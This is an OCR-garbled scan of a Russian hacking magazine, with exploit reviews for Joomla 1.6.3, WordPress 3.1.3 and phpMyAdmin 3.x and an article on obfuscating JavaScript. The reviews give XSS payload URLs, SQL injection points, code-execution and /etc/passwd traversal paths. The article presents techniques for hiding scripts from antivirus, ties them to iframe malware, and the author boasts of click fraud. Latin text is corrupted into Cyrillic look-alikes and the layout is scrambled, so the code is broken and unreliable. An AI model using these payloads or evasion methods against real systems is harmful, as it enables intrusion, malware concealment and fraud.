1"; ><Бсгірб>а1егб(/Х55/)</5Сгірб> 

Для других компонентов ситуация не сильно отличается: 

• бббр : //аббаскег . іп/доот1а163_по5ео/іпсІех . рбр?орбіоп=сот_с 
опбепб8Л/іем=сабе§огу&іб=19&ІбетісІ=260&1ітіб=10&Л1бег_огсІег_ 
0іг=8^ітібБбагб=&Л1бег_огсІег=><5сгірб>а1егб(/Х55/)</5Сгірб> 
бббр : //абііаскег . іп/доот1а163_по5ео/іпсІех . рбр?орбіоп=сот_п 
еы5■РеесІ5&ѵіе^л^=сабе§опу&ісI=17&ыI^абеѵегеI^епе= ,, ; ><зсгірб> 
а1егб(/Х55/)</Бсгірб>&ІбетісІ=253&1ітіб=10&1і1бег_огсІег_ 



статочно хорошо проверяет данные, переданные клиентом, в результате 
чего пользователь с привилегиями Есіііюг может внедрить произ- 
вольные ЗОБ-команды в параметрах огбегЬу и огбег. Следующие БІРБ 
показываютточки внедрения ЗОБ-команд (помечены обозначением 
[ШЛЯПА]): 



0іг=А5С&Л1бег_огсІег=огсІегіп§ 

• бббр : //аббаскег . іп/ доот1а163_по5ео/іпсІех . 
рбр?орбіоп="; ><5сгірб>а1егб(/Х55/)</5сгірб>&ба5к=геБеб . 
гедиезб 



• Ііббр://1оса1Ііо5б/ыр-асІтіп/есІіб-ба§5 . рИр ? 
бахопоту=1іпк_сабе§огу&огсІепЬу=[ШЛЯПА]&огсІег=[ШЛЯПА] 

• Ііббр://1оса1Ііо5б/ыр-асІтіп/есІіб-ба§5 . рМр ? 
бахопоту=ро5б_ба§&опсІепЬу=[ ШЛЯПА] &огсІег= [ШЛЯПА] 

• Ііббр://1оса1Ііо5б/ыр-асІтіп/есІіб-ба§5 . рМр ? 
бахопоту=сабе§опу&опсІепЬу=[ ШЛЯПА] &огсІег= [ШЛЯПА] 

Аналогичная ситуация наблюдается с функцией деШЬооктагкзО, 
которая находится в файле ѵѵр-іпсІибез/Ьооктагк.рбр, БіРБдля 
последующей эксплуатации выглядит похожим образом: Ьббр:// 
1оса1Ііо5б/и/р-асІтіп/1іпк-тапа§еп. рНр?огсІегЬу= [ШЛЯПА] & 
опсІеп=[ШЛЯПА] . 

Чутьнезабыл, что инъекции тут слепые, поэтому вручную тут л овить 
нечего, а надо бы воспользоваться благами цивилизации, то естьсред- 
ствами автоматизации. К примеру, запросто сгодится всеми известный 
здітар, входящий в состав ВаскТгаск. 



ТАВ6ЕТ5 



ѴѴогбРгеззЗ.1 .3/3.2-РС1 и, возможно, более ранние версии. 



А вот для эксплуатации уязвимости в компоненте сот_зеагсб и параме- 
тре зеагсбѵѵогб придется изменить РОЗТ-запрос любыми подручными 
средствами (Біѵе НТТРНеасІегз.ТаппрегОаІа, еіс). В результате запрос 
должен принять примернотакой вид: 

Р05Т /доотіаібз/іпсіех. рМр НТТР/1.1 
Кебегег : бббр : //аббаскег . іп/доот1а163/ 

ІІ5ег-А§епб: Копдиегог/4. 5 
Сасбе-Сопбгоі: по-сасбе 

Сопбепб-Туре : арр1ісабіоп/х-ыыы--Рогт-иг1епсосІесІ 
Нозб: аббаскег.іп 
Ассерб-ЕпсосІіп§: §2Ір і сІеЛабе 
Сопбепб-Іеп^біі : 125 

орбіоп=сот_5еагсІі&5еагсІіыогсІ= ’%2522%253С%252Р5СГІрб%253Е%2 
53С5СГІрб%253Еа1егб(%252РХ55%252Р)%253С%252РБСГІрб%253Е&ба 
5к=5еагсІі 



ТАВОЕТ5 



Зоотіа! 1 .6.3 и более ранние. 



ф 048 
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г гі .. 




ЕХРЮІТЗ 
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ЕХРЮІТЗ 

РЕѴІЕѴѴ 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 





50ШТІ0М 



Надо обновиться до Зоотіа! 1 ,6.4или более поздней. 



05 



Множественные уязвимости 
в рПрМуАсіппіп 3.x 



И что же мы видим? Массив $с извлекается из$_5Е55І0І\І, над которым 
мы имеем полный доступ, благодаря багу, рассмотренному ранее. Таким 
образом, мы можем записать в файл сопбд/сопЛд.іпс.рбр произвольный 
РНР-код, который выполнится при его просмотре! 

Переходим куязвимости номертри. Вот интересные строчки из файла 
5егѵег_5упсбгопІ2е.рЬр: 



СѴ55Ѵ2 



7.5 






(АѴ: ІМ/АС : Ши : N/0 : Р/І : Р/А: Р) 



В июле месяце неким исследователем под ником Мапдо был обнару- 
жен рядуязвимостей в рбрМуАсІппіп — популярном веб-приложении, 
предназначенном для администрирования СУБД Му5(ЗІ_. Среди них 
множество 501-инъекций и Х55 разной степени сложности, произ- 
вольные выполнения кода и выходза пределы корневой директории 
веб-сервера. Разберемся сними по порядку. 



ЕХРЮГТ 



В файле ІіЬгагіез/аиіЬ/Бѵѵекеу/Бѵѵекеу.аиіЬ.ІіЬ.рЬр рассмотрим кусок 
кода на 266-276 строках: 

і-р (б1:п5і:г($_ 5ЕКѴЕК[ ' (21ІЕКѴ_5ТКІІ\ІС ' ] , ' зеззіоп_1:о_ип5е1: ■ ) 

! = Таізе) 

{ 

рагзе_з1:г($_5ЕКѴЕК[ ' (211ЕКУ_5ТК11\1С ' ]); 

зеззіоп_іл/гі1:е_с1о5е( ) ; 

5е55Іоп_ісІ($5е55Іоп_1:о_ип5е1:) ; 

5еззіоп_5І:аг1:(); 

$_5Е55ІОМ = 'гау( ) ; 

зеззіоп_іл/гі1:е_с1о5е( ) ; 

зеззіоп_сІе5І:гоу ( ) ; 

ехіі; 

} 

Замес здесь состоит в том, что функция раг5е_5Іг принимает лишь 
один параметр, что позволяет нам получить доступ ко всем пере- 
менным в текущем пространстве имен, в том числе к массиву $_ 
5Е55І0ІМ. Это открывает возможности для эксплуатации ряда 501- 
инъекций и Х55, но не будем останавливаться на них, а перейдем к 
более серьезным багам. 

На рисунке приведен кусок кода, который генерирует конфигураци- 
онный файл, обрати внимание на строчку 42, где создается некий 
комментарий с дополнительной информацией в конфиге. Легко 
видеть, что вызов $с1 : ->де1;5егѵегМате($ісІ) фильтруется на закры- 
тие, собственно говоря, коммента. Зато переменная $ісІ, входящая в 
массив $с[‘5егѵегБ’], никак не фильтруется. Таким образом, появля- 
ется возможность вставить символы закрытия коммента */, а заодно 
и выполнить произвольный РНР-код. Генерируется же массив $с 
вызовом функции $сЛ>де1:СопРд() на строке 26. А вот, собственно, и 
КОД ЭТОЙ функции: 

риЫіс -Рипсіііоп §е1:Соп6§() 

{ 

$с = $_5Е55ІОІ\і[$1:ііІ5->ісі]; 

-Рогеасб ($1:ІіІ5->с-Р§ІІрсІа1:еКеасІМарріп§ аз $тар_1:о => 
$тар_-Р г 'от) 

{ 

РМА_аггау_ыгі1:е($тар_1:о і $с., РМА_аггау_геасІ( 

$тар_-Ртггц $с)); 

РМА_аггау_гетоѵе($тар_Т ГОІТ ц $с); 

} 

геіигп $с; 

} 



466: $іг§_сІЬ = $_5Е55ІОМ [ ' іг§_сІЬ ' ] ; 

477 : $ипсоттоп_1:аЫе5 = $_5Е55ІОМ [ 1 ипсоттоп_1:аЫе5 ' ] ; 

674: РМА_сгеа1:еТаг§е1:ТаЫе5($5гс_сІЬ : , $1:г§_сІЬ „ $згс_Нпк,, 
$1:г§_1і п к л $ипсогптоп_1:аЫе5, 
$ипсоттоп_1:аЫе_5І:гис1:иге_сІі-р-р[$5] , 
$ипсоттоп_1:аЬ1е5_Іте1сІ5, Таізе); 

Функцию РМА_сгеаІеТагдеіТаЫе5 можешь посмотреть на со- 
ответствующем рисунке. Видно, что переменные $ипсоттоп_ 
ІаЫеБ[$ІаЫе_іпсІех] и $1гд_сІ Ь извлекаются из уже знакомого нам 
массива $_5Е55І0І\І. Используя уязвимость, описанную ранее, 
ты можешь записывать все что душе угодно в первый и второй 
параметры функции ргед_гер1асе, находящейся на строках 627-631 . 
Например, мы можем использовать модификатор «е» в шаблоне 
регулярного выражения, тем самым, исполняя второй аргумент 
функции как РНР-код. 

В этом баге есть два неприятных момента. Первый: если на сервере 
установлен патч ЗиЬозіп, то ничего не будет работать... Второе: нужно ау- 
тентифицироваться, прежде чем мочить в этот ба г, иными словами знать 
логин и пароль какого-нибудь пользователя БД. 

Наконец, мы дошли до последнего, четвертого бага. Рассмотрим файл 
ІіЬгагіе5/бІ5рІау_іЫ.ІІЬ.рбр, строчки 1 291-1299: 

і-р ($СІ_ОВАІ_5 [ ' сР§Ке1а1:іоп ' ] [ ' тітеыогк 1 ] && 

$СІ_ОВАІ_5 [ ' сР§ ' ] [ ' ВгоызеМІМЕ ' ] ) 

{ 



(іззе1:($СІ_0ВАІ_5[ 'тіте^ар' ] [$те1а->пате] [ 'тітеіуре' ]) && 
іззе1:($СіІ_0ВАІ_5[ 'тіте_тар' ] [$те1:а->пате] [ Чгапз-Рогтаіііоп ' ]) && 
!етр1:у($С1_ОВА1_5[ 'тіте^ар' ] [$те1:а->пате] Чгапз-РогтаНоп 1 ])) 

{ 

$іпс1исІе_Іт1е = 

$СІ_ОВАІ_5[ 'тіте^ар' ] [$те1а->пате] [ Чгапз-РогтаНоп ' ] ; 

і-р (61е_ехІ5І:5( ' ./ИЬгагіез/Іігапз-РогтаІііопз/ ' . 
$іпс1исІе_Рі1е)) 

{ 

$ігап5-Ропт-Рипс1:іоп_пате = 5іг_гер1асе( ' . іпс . рИр ' , ' ' , 
$СІ_ОВАІ_5[ 'тіте^пар' ] [$те1:а->пате] [ Чгапз-Рогтаііоп ' ]); 

гедиіге_опсе 

' ./НЬгагіез/Іігапз-РоптаІііопз/ ' . $іпс1исІе_61е; 

В вызове гедиіге_опсе используется переменная $іпсІис!е_Рі Іе, 
которая определяется через массив $6І_0ВАІ_5, доступный для ре- 
дактирования на стороне клиента. Например, присвоив переменной 
$6І_ОВАІ_5[ ' шіте_тар ' ] [$теі;а->пате] [ Чпапз-Роптаіііоп ' ] зна- 
чение «../.У../../../.. /еіс/ раззѵѵсі», мы увидим содержимое файла /еіс/ 
раззѵѵсі. Косяк лишь в том, что этот багтакже требует аутентификации. 
На ехрІоіІ-сІЬ.сопп лежат два эксплоита под это дело, их номера 1 751 0 и 
17514, дерзай! 



ТАВ6ЕТ5 



рРірМуАбтіп < 3.3.10.2 II рЬрМуАбтіп < 3.4.3. 1 



ЮШТЮЫ 



Прокачать рбрМуАсІтіп до последней версии, зс 
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• Обфускация - это приведение исходного текста программы к виду, 
сохраняющему ее функциональность, но затрудняющему анализ, 
понимание алгоритмов работы и модификацию при декомпиляции. 
Применительно к ^ѵаЗсгірІ данная технология используется в таких 
видах теневого онлайн-бизнеса, какзагрузки (іігаше), спам и ЗЕО. 
Наша задача на сегодня - изучить все методы скрытия ^-кода, 
которые, я надеюсь, ты будешь использовать только во благо. 



Теория 

Во-первых, ответим сами себе на несколько вопросов: 

1. Что будем прятать? 

Прятать будем только клиентскую часть ѵѵеЬ-приложений, то есть 
то, что в конце концов загрузит к себе на компьютер обычный 
пользователь. 

К этому типу можно отнести следующие технологии: 

• НТМІ_-код страницы; 

• Чаѵа5сгір1:-код/Ч5-файлы страницы; 

• С55-код/С53-файлы страницы; 

• Изображения и другую информацию (только в браузерах, поддер- 
живающих протокол «баіа»). 

2. От кого прятать? 

Прятать всю эту информацию резонно от: 

• антивирусов (если речь идет об ібга те или других вредоносных 
скриптах); 

• других людей (например, если ты написал чудесный скрипт на 
^ѵаЗсгірІ и не хочешь, чтобы кто-то его «содрал» себе). 

3. Насколько можно быть уверенным в безопасности скрытой 
информации? 



Уверенным быть нельзя. 

Почему? Потому что вся информация, которую загружает поль- 
зователь, все равно выполняется браузером. Это значит, что 
даже если закриптовать/скрыть информацию очень сложным 
способом, это не будет означать, что твой код нельзя будет про- 
читать. Прочитать будет можно в любом случае, ты сможешь лишь 
затруднить это чтение. Как раз об этих способах затруднения мы 
и поговорим. 

4. Как происходит процесс криптовки/обфускации в принципе? 

Тут есть два различных этапа: создание обфусцированного/крип- 
тованного кода и его расшифровка для нормального выполнения 
браузером. Генерировать обфусцированный код мы будем с помо- 
щью РНР-скриптов, хотя делать это можно с помощью чего угодно. 
А вот расшифровку выполнения кода нужно писать на ЧаѵаЗсгірІ: в 
этом случае скрипт, по сути, расшифрует и выполнит сам себя. 

Базовое шифрование НТМІ./С55 

Что делать, если нам нужно зашифровать НТМІ_- или СЗЗ-код? Все 
просто: зашифровать на ЗаѵаЗсгірІ, а после расшифровки вставить 
как НТМІ_-код. 



► 050 
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А теперь просто создадим папку «Іехі», в которую поло- 
жим наш скрипт («зсгірІ^Б») под именем «]аѵа5сгі рі;» и 
поменяем атрибуты местами. Это будет выглядеть так: 



Обфусцированный скрипт 



скрыть («Бсгірі^а»). На странице «іпбех.ЫтІ» у нас 
указано: 



кзсгірі: Ііуре^ЧехІі/ЗаѵаБсгірІ:" 

5РС = " . / зсгіріі . ] 5 " ></ Бспіріі > 



<5сгір1: 5гс="1:ех1:/ ЗаѵаБсгірІ:" 

Туре=Ч/5сгір1:. Зб'^/зсс^-Р^ 



кил 

Работа ІІЕпсосІе 

Пример вставки (без шифровки/крипта/обфускации): 



Для лучшего эффекта сразу отвлечем внимание поль- 
зователя на путь. Например, так: 

<5сгір1: Бгс^ЧехІі/заѵаБсгірІ:" 1:уре= " И1;1: р : // ііобі: . 
сот/очен ь/длинный/ путь/ который /сразу/бросится/ в/ 
глаза/БсгірІ: . ]5"></5спір1:> 



гчГЬь 

НТТР://ѴШѴѴ 



"і — ■ 

> и п к б 



<И1:т1> 

<зсгір1:> 

ѵаг ІгЬтІ = ' <сеп1:ег><бЗ>Пример хтмл-кода</бЗ> 
к/сепііег^; // кидаем в переменную "ІтІітГ'-код, 
который хотим вставить 

сІоситеп1;.§е1:Е1етеп1:5ВуТа§Мате( ' ІтЬтІ ' ) [0] . 

іппегНТМІ. = М:т1; // вставляем между тегами 
<И1:т1> и </И1:т1> 

</зсгір1:> 

</Иі:т1> 

Точно так же мы поступим и с С55-стилями: 



Проверено на личном опыте: работает отлично! 
Таким способом я сам накручивал партнерку по кли- 
кам, так как пришлось использовать накрутчик на 
ЗаѵаЗсгірІ. Администрация партнерки его так и не 
увидела :]. 

ЗаѵаЗсгірі-обработчики 

Данный способ также не является универсальным 
средством для сокрытия 35-кода, но все же я расскажу 
о нем. Главная идея состоит в том, чтобы прятать код 
внутрь обработчиков событий опІ_оасІ, опСІіск и т.д. То 
есть примерно в следующие конструкции: 



Іог.сот — неплохой 
пабликобфускатор. 

• Щ[-8.]р/риЫ.іс/]]еп- 
собе.ЫтІ — ориги- 
нальный японский 
криптер. 

• беап.ебѵуагбз. 
пате/раскег — пакер 
ІаѵазсгірГ 

• ]5ЬеаиЦбегогд — 
делаем кодчитаемым. 



<И1:т1> 

<зсгір1:> 

ѵаг С55 = 'ЬобуІтаг^іпіѲрх^.БиЬсІІраббіп^іБрх;}' ; 
// кидаем в переменную "сбб" код, который 
// хотим вставить 

сІоситеп1:.§е1:Е1етеп1:5ВуТа§Мате( 'б^ті' )[0] . 
іппегНТМІ. = ' КБѣуІе^+СББ+Ч/зІгуІе^ ; 

// вставляем между тегами <И1:т1> и </Іі1:т1> 
</зсгір1:> 

</Ы:т1> 

Теперь постараемся абстрагироваться от НТМІ_ и С55 и 
поговорить только о самой сути — сначала скрытии, а 
затем и криптовке ЗаѵаБсгірТ 

Прежде, чем кто-либо захочет посмотреть и расшифро- 
вать наш код, он постарается его найти. Ниже ты най- 
дешь несколько действенных методов сокрытия кода от 
глаз любопытных пользователей. 

Замена атрибутов 
тега <5спрт> 

Все очень просто, но это нельзя считать хорошей или 
даже средней защитой, так как она ориентирована на 
невнимательность пользователей. 

Сам принцип донельзя прост. Мы имеем страничку 
(«іпбех.ЫтІ») и ЗаѵаЗсгірІ-файл, код которого мы хотим 



<ЬосІу опІоасІ= ,, а1ег1:(1) ; "></ЬосІу> 
кТехТагеа опС1іск="а1ег1:(1) ; "></1:ех1:агеа> 

Например, для тегов бобу и ітатеБеІ есть обработчик 
опІ_оасІ, который запустит в нем прописанный код после 
загрузки страницы/фрейма. 

Отмечу, что не для всех объектов обработчики одина- 
ковы. 

Соокіе, РеТеггег и адрес 

баѵаЗсгірІ можно также спрятать и в такие нестан- 
дартные места, каксоокіе (боситепі.соокіе), реферрер 
(боситепі.геіеггег) и адрес страницы (Іосабоп.Ьгеіф В 
данном случае код будет храниться как обычный текст, 
а выполняться с помощью функции еѵаЦ], которая 
берет в качестве аргумента текст и выполняет его как 
баѵаЗсгірІ-код. 

В качестве примера примем такое допущение, что у нас 
уже установлены кукисы следующего вида: 




> СІѴСІ 



На нашем дискеты 
найдешь подробный 
видеоурок по всем 
приемам обфуска- 
ции баѵаЗсгірІ: кода, 
описанным в данной 
статье. 



соокіеѵа1ие= | |а1ег1:(1); | | 

Теперь выполним этот алерт следующим образом: 



<5сгір1:>еѵа1(ипе5саре(боситеп1: . соокіе) . 
зрИНС'І Г')[1]);</5спірг> 
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Прячем слово «Пакер» в теле документа 



Здесь мы берем текст всех соокіе-записей для нашего хоста и 
делим его на части в местах, где стоит «II». Затем берем второй 
элемент ([1]) и запускаем его через еѵаЦ]. 

Данный способ не так уж и плох, так как код, который мы хотим 
исполнить, не виден на самой странице, а также потому, что мы 
можем заставить код удалить самого себя! Пример реализации: 

< ? рИр 

// ставим в куки ЗаѵаБсгірТ-код + код удаления (замены на 123) 
5еТсоокіе( ' соок ' , ' | | аіегіі(і) ;сІоситеп1:. 
соокіе="соок=123"; | | ' ) ; 

?> 

<зсгір1:> 

// исполняем код и удаляемся 

еѵа1(ипе5саре(сІоситеп1: . соокіе) . врІііД ' | | ' ) [ 1 ] ) ; 

</зсгір1:> 

Аналогичным образом можно использовать и другие строки, доступ- 
ные через ЗаѵаЗсгірІ:, например, Іосабоп.бгеі 1 и сіоситепі.геіюггег. 

Сокрытие кода на А|ах 

В данном случае код будет находиться в отдельном файле, а его 
запуск будет осуществляться с помощью чтения этого файла и 
выполнения его содержимого функцией еѵаЦ). 

Нам понадобится составить страницу со скрываемым кодом, а 
также страницу с функцией запуска этого кода: 

1. Страница с кодом, который мы хотим скрыть (с именем «I»): 

а1егТ(1); 

2. Страница с вызовом кода: 

<5сгірТ> : ипсТіоп х(){1:гу{ге1:игп пем ХМІ_Н1:1:рКедие5І:( ) ; } 
саТсб(е){1:гу{ге1:іігп пем АсТіѵеХОЬдесіД 'МБхтіг.ХМІНТТР' );} 
са1:сІі(е){1:гу{ге1;игп пем АсТіѵеХОЬдесіД 'Місгобо-Рі: . 

ХМЬНТТР 1 ) ; }са1:сІі(е){ге1:игп пиіі; }}}};-Рипс1:іоп 

у( ){ѵаг 2 =х();і 1 : ( 2 ){ 2 .ореп( ' §еТ' > ' . /1 ' ) ; 2 . 
опгеа<Зу5ТаТесбап§е=-Рипс1:іоп(){ -р(г . геасІу51:а1:е==4){еѵа1(2 . 
гевропзеТехТ) ; }}; 2 . 5епсІ(пи1 ); }};у() ;</зсгір1:> 

Данный метод скрывает код в отдельном файле (в нашем случае 
«[»). Конечно, можно найти путь файла и открыть его, но при обфу- 
скации подобного кода найти имя файла достаточно трудно. 

Нуллбайт атакует Оперу 

Этот метод прост и достаточно эффективен, но, к сожалению, 
он рассчитан только на браузер Орега. Суть метода в том, чтобы 
перед скрываемым кодом поставить так называемый нуллбайт 
(нуллбайт или пиіібуіе — это символ с А5СІІ кодом «О»), Зачем? 
Затем, что Орега просто-напросто не показывает код во встроен- 
ном просмотрщике после данного символа. Пример: 

<ІтІ:т1>тут какой-либо код</Іі1:т1> 

< ? рИр есбо(с!іг(0) ) ; ?> 
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Работа обфусцированного алерта 

<5сгір1:>а1еп1:(1) ; /* этот код мы скрыли */</5спір1:> 

В данном примере сначала идет нормальный код, который нам 
скрывать не требуется. Потом с помощью РНР мы вставляем нулл- 
байт, а после него идет скрываемый код. 

Прячемся в НТ/ѴИ-коде 
и комментариях 

Код можно легко спрятать в НТМІ_, затем обработать его и выпол- 
нить. Например, вот так: 

<ЬосІу><іт§ 5гс=" ./рісТ.зРё" а="а1" Ь="ег" с="1:(1) ; "></ЬосІу> 
<зсгір1:>а = сІоситепТ . Ьосіу . іппегНТМЩ еѵа1(а . 5р1і1:( ' а=" 1 ) 

[1] . зрНі:( ' " ' ) [0]+а . зрііі: ( ' Ь=" ' ) [1] . зрН1:( ' " ' ) [0]+а . 

5р1іТ( ' с= " ' ) [1 ] . зрііі: ( ' " ' ) [0] ) ; </ зсгірТ> 

В данном случае мы спрятали код в атрибутах тега іппд, после чего 
обработали код всей страницы, собирая разбросанные кусочки. 
Таким же способом можно скрывать текст в НТМШаѵаЗсгірІ; ком- 
ментариях: 

Комментарий на НТМІ_: 

<!-- а1егТ(1) ; --> 

Комментарий на ЗаѵаЗсгірІ:: 

// а1егТ(1) ; 

/* а1егТ(1); */ 

Отдельно стоит отметить, что очень эффективно можно прятать код 
внутри популярных фреймворков — например, ] 0 и е гу, тооТооІз 
и подобных. Эти файлы не являются подозрительными, а иссле- 
дование их займет много времени (хотя всегда существует воз- 
можность автоматического сравнения оригинала и измененного 
файла). 

Теперь же, думаю, можно поговорить о том, что, в конце концов, 
видит эксперт безопасности, и о том, что исследуют антивирусы. 
Ниже читай о наиболее популярных методах криптовки и обфуска- 
ции 35-кода. 

Субституция стандартных. 

ФУ н кци и Аметодоа 3 а ѵаьсп рі 

Данный метод ориентирован на то, чтобы вместо стандартных 
функций или методов ЗаѵаЗсгі рі подставить свои переменные: 

До субституции: 

<5сгір1:>сІоситеп1: . §еТЕ1етепТвВуТа§Мате( "бТтІ" ) [0] . іппегНТМІ. 
= сІоситепТ.беТЕІетепТБВуТабМатеС'ЬосІу" ) [0] .1еп§1:Іі; 
</зсгір1:> 

После субституции: 

<5сгір1:>а=сІоситеп1:; с= ' §еТЕ1етеп1:5ВуТа§Мате ' ;а[с] ("ІіТтІ") . 
іппегНТМІ. = а [ с ] ("Ьосіу") [0] . іппегНТМІ . 1еп§Тб; </5сгір1:> 

В данном случае мы заменили объект «боситепі» переменной 
«а», а метод деіЕІетепІзВуТадЫаппе переменной «с». Следует 
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Делаем скрипт читаемым 



заметить, что методы (то, что начинается точкой, например, 

.Іепдіб или .деіЕІетепІБВуТадІЧате) можно также заменять 
определением ключа в массиве (если рассматривать объект как 
массив). Если у нас есть объект «боситепі», а в нем есть элемент 
деіЕІетепІБВуТадІЧате, это означает, что мы может вызвать его 
двумя способами: 

1) сіоситепі: . §е1:Е1етеп1:5ВуТа§І\Іате 

2) сІоситеп1:[ ' §е1Е1етеп1:5ВуТа§1\1ате ' ] 

Из этого следует, что во втором способе мы используем строковые 
данные («деіЕІетепІБВуТадІЧате»), следовательно, их можно 
заменить на переменную, содержащую в себе строку — название 
метода. 

Субституция полезна в случае частого использования одного и 
того же стандартного объекта/функции/переменной. Это сильно 
меняет код, а также сжимает его. 

Флуд комментариями и кодом 

Данный способ рассчитан на то, чтобы вставить в обфусцируемый 
код флуд, то есть что-то, что не несет смысловой нагрузки для 
кода скрипта. Флудить можно как код, так и комментарии: 

Флуд комментариями: 

<зсгір1:>/* рОІЕРСрткеіЗР§ */ а /* РСрткеіЗР§§ме§ */ = /* 
тк613Р§ */ ' бабаба' /* рОІЕ13Р§ */ ; /* ые§ЕСоб */ аіегі: /* 
оіыЬоіегбрег */ ( /* і§ыергеогб */ а /* ыЬпропгбК */ ) /* 
іпЬоіегб */ ; /* гоіпего */</5сгір1:> 

Флуд кодом: 

<зсгір1:> меоіЬо§ = ' §мгоЬ§оегб ' ; а = ' бабаба ' ; ЬбопЬ = 
'ы§ео§іоые§ 1 ; а1ег1:(а); 




оЬГ^гаілчіз 



Тип: ^сгір* Баірі ВІе 
Изменен: 04.07.2011 13:44 
Размер: 7Д6 КБ 



Разница в размерах скриптов до и после обфускации 



ный способ шифровки, не требующий функций-помощников для 
расшифровки: 



<зсгір1:> аіегі: (сіоситепі: ["\х63\х6Р\х6Р\х6В\х69\х65" ] ) ; 
</зсгір1:> 



В данном случае флуд комментариями слишком плотный, хотя на 
самом деле код был очень простым: «а = «бабаба»; аіегі(а);». 

Флуд кодом можно также мешать с флудом комментариями. При 
желании можно написать РНР-функцию для добавления флуда в 
код ^ѵаБсгірЕ Лично я брал какую-то статью с английского блога, 
парсил на слова, и функция добавляла случайное количество этих 
слов в комментарии. 

Кстати, желательно также использовать многострочные коммента- 
рии в форме «фальшивого закрытия»: 



В данном случае мы — во-первых, использовали внутреннюю 
переменную «соокіе» объекта «сіоситепі;», как элемент массива. 
Во-вторых, мы перевели ее имя в шестнадцатеричный формат. 
Если бы мы использовали переменную «соокіе» через точку, то 
есть как сіоситепі. соокіе, то мы бы не смогли перевести обра- 
щение к ней в шестнадцатеричный формат, так как это относится 
только к строкам (в массиве ключ является строкой), а в сіоситепі. 
соокіе строк нет. 

РНР-функция перевода в шестнадцатеричный формат: 



/*/ а1ег*(1); /*/ а1егі:(2) ; /*/ а1еП:(3); /*/ 

Какое из чисел покажет алерт? :) 

Замена текста 

шестнадцатеричными кодами 

Я хотел отнести к этому пункту и кое-какие другие способы преоб- 
разования текста, но оставил только этот, так как это единствен- 



<?рбр 

-Рипсііоп сезсаре($5) 

{ 

-Рогеасб (з1:г_5р1і1:($5 л 1) аз $5ут) 

{ 

$сІ = сІесбех(огсІ($5ут) ) ; 

$с[] = (5І:г1еп($сІ) == 1) ? ' 0 ' . $сІ : $сІ; 

} 
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геѣигп ( ' х ' . ' \\ ' .ітр1осІе( ’х ' . ' , $с) ) ; 

} 

?> 

Трюк с несуществующими 
функциями 

Как мы уже знаем из прочитанного выше, в баѵаБсгірІ 
можно вызывать методы, как элементы обьекта: боситепС 
деіЕІетепіВуІб и босиппепД'деІіЕІетепіВуІб’]. Оба варианта фак- 
тически одинаковы, различие есть только в записи — во втором 
варианте мы используем строку. 

Как-то вечером я придумал очень интересный способ получения 
подобных строк. Например, нам нужно зашифровать вышеупо- 
мянутый «деіЕІетепіВуІб». Отвлечемся на короткое объяснение 
данного способа с помощью такого примера: 

<зсгір1:> а = Ь(с(б())); </зсгір1:> 

Этот скрипт не будет работать, так как функции Ь, с и б не были 
ранее объявлены. Теперь попробуем сделать так, чтобы этот код 
заработал, для этого будем использовать «песочницу» конструк- 
ции 1гу{}са1сЫ){}: 

<5сгір1:> 1:гу{а = Ь(с(б()))}са1:сІ (е){а1ег1:(е) ; } </зсгір1:> 

После запуска мы увидим ошибку, а это значит, что, хоть код и 
не является рабочим, он не остановил выполнение оставшейся 
корректной части. 

А вот теперь мы зададимся вопросом, как такая схема может 
быть связана с шифрованием строки «деіЕІетепіВуІб»? 

А вот так: 

<5сгір-1;>1:гу{(§е1:Е(1ете(п1:В(уІсІ()))))}са1:с (е){х = (е+'‘). 

5 рііі: ( '(').5Іісе(1,5) . доіп( ' ' ) ; }</зсгір1:> 

После выполнения этого кода у нас получится строка 
«деіЕІетепіВуІб», содержащаяся в переменной «х». 

В чем соль этого метода? В том, что эвристический анализ анти- 
вирусов при нахождении функций будет ругаться на то, что они 
не существуют. Тем самым мы обфусцируем код не на уровне 
шифровки строк разными способами, а на уровне получения дан- 
ных строк от самого ЭаѵаВсгі рі;. 

Числа с помощью оператора «~» 

Оператор «~» (тильда) является битовым отрицанием и использу- 
ется вот так: «аІегД-1 3);». Этот код выведет нам «-14». Работает 
данный оператор по принципу «-(число+1 )». 

Представим, что мы хотим присвоить переменной «а» какое- 
нибудь число, причем нигде это число не писать: «а = -[]»; 
Данный код присвоит переменной «а» число «-1». Почему? 
Потому что массив представляет собой нейтральный элемент 
с числовым значением «О», следовательно, ~0 равносильно 
«-(0+1 )», то бишь -1 . 

Примеры других преобразований: 

а = -[]; // -1 
а = -[]; // 1 
а = []*[]; // 0 
а = —[]; // 0 
а = ~ ; // -2 

а = ~-РаІ5і ; // -1 

а = — []*(""+ — [] + [] + ); // 153 

уквы и строки 
ез строковых данных 

Иногда требуется получить букву/символ или какой-то текст без 



его явного написания. Сделать это позволяет одна особенность 
баѵаЭсгірС В этом языке существуют различные внутрисистемные 
сообщения, которые можно преобразовать в текст, а затем этот 
текст обработать. 

Например, представим, что нам нужно получить текст «собе». 

Эта строка содержится в именах таких методов, как сбагСобеАД), 
бготСЬагСосІеО и других. Получить текст можно следующим 
образом: 

а = (аіеі^' ' ) . 5 рі іі: ( "іѵе " ) [1] . 5иЬз1:г(0,4) ; 

В данном примере переменная «а» будет содержать текст 
«собе». Разберем подробнее. Попробуй исполнить вот такой 
код: «аІегДаІеги”);». Ты увидишь что-то вроде «Ішпсііоп аІегД) 

{ [паііѵе собе] }». Тем самым, использовав всего-навсего 
два раза функцию аІегД), мы получили совершенно другие 
символы. 

Теперь постараемся понять, как это все работает. Представим, 
что у каждого объекта, функции и всего остального в баѵаЭсгірІ 
есть некое «описание». Чтобы получить к нему доступ, нужно 
явно изменить тип данного объекта или функции на строковой, 
присоединив, например, пустую строку (+»»). 

Шифровка строк 

Для шифровки/расшифровки строк в баѵаЭсгірІ существуют 
несколько полезных функций. Разберем некоторые из них: 

е5саре(); // шифрует строку как ІЖІ_ 
ипезсаре(); // дешифрует ІЖІ_-строку 
епсобеІІКІ( ) ; // шифрует строку как ІІКІ 
бесобеІІКІ() ; // дешифрует ІІКІ-строку 

Также есть два метода объекта Эігіпд, которые работают с преоб- 
разованием символа в АЭСІІ-код и наоборот: 

а = 51:гіп§.-РготСІіагСобе(97) ; 

Ь = "Ь" . сбагСобеА1:() ; 

Стоит учесть, что строки можно преобразовывать еще и регуляр- 
ными выражениями в сочетании с методами .таІсЬ и .геріасе. 
Другие методы можно отнести, скорее, к поиску по строке. 

Преобразование 

оОъектов/переменных 

Имена объектов и переменных можно также преобразовать 
в строку (например, чтобы потом эту строку зашифровать). 
Преобразование происходит по тому же принципу, что и пре- 
образование имен методов, то есть с помощью перехода из 
формы «.метод» в форму «[метод]». Для корректного преоб- 
